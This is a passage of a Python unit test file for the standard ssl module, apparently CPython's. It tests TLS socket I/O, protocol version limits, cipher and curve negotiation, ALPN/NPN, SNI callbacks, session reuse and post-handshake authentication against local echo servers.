for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and has_tls_version('TLSv1_3'):
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_minimum_version
@requires_tls_version('TLSv1_2')
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_minimum_version
@requires_tls_version('TLSv1_1')
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_minimum_version
@requires_tls_version('TLSv1_2')
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_minimum_version
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
# Ignore expected SSLError in ConnectionHandler of ThreadedEchoServer
# (it is only raised sometimes on Windows)
with support.catch_threading_exception() as cm:
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
